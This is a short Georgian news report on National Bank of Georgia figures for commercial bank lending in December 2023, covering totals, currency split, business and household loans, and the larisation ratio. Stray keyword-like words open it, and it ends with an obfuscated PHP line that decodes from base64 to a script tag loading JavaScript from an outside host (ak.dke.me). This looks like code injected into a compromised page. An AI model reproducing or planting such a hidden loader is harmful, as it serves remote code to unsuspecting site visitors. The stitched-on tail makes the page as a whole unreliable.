celsiusi
ავერსი შნაიდერი

 საქართველოს ეროვნული ბანკის ინფორმაციით, კომერციული ბანკების მიერ გაცემული სესხების მოცულობა, 2023 წლის დეკემბერში, წინა თვესთან შედარებით 1.46 მლრდ ლარით, ანუ 2.86%-ით გაიზარდა და დეკემბრის ბოლოს 52.65 მლრდ ლარი შეადგინა.

ეროვნული ბანკის ცნობით, ამავე პერიოდში ეროვნული ვალუტით გაცემული სესხების მოცულობა 933.50 მლნ ლარით, ანუ 3.35%-ით, ხოლო უცხოური ვალუტით გაცემული სესხების მოცულობა 528.77 მლნ ლარით, ანუ 2.27%-ით გაიზარდა.

ამასთან, ეროვნული ბანკის მონაცემებით, რეზიდენტი იურიდიული პირებისათვის 2023 წლის დეკემბრის ბოლოს, კომერციულ ბანკებს ეროვნული ვალუტით გაცემული ჰქონდათ 8.79 მლრდ ლარის მოცულობის სესხი, რაც წინა თვესთან შედარებით 6.03%-ით მეტია, ხოლო უცხოური ვალუტით 14.87 მლრდ ლარის მოცულობის სესხი, რაც წინა თვის მაჩვენებელს 2.48%-ით აღემატება.

ეროვნული ბანკის ანგარიშის მიხედვით, 2023 წლის დეკემბრის განმავლობაში 2.22%-ით, ანუ 590.97 მლნ ლარით გაიზარდა რეზიდენტი შინამეურნეობების სექტორის დაკრედიტების მოცულობა და დეკემბრის ბოლოსათვის 27.19 მლრდ ლარი შეადგინა. 2023 წლის დეკემბრის ბოლოსათვის, მთლიანი სესხების ლარიზაციის კოეფიციენტმა 54.76 პროცენტი შეადგინა. წინა თვის ბოლო მდგომარეობასთან შედარებით, 0.26 პროცენტული პუნქტით გაიზარდა.

176
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");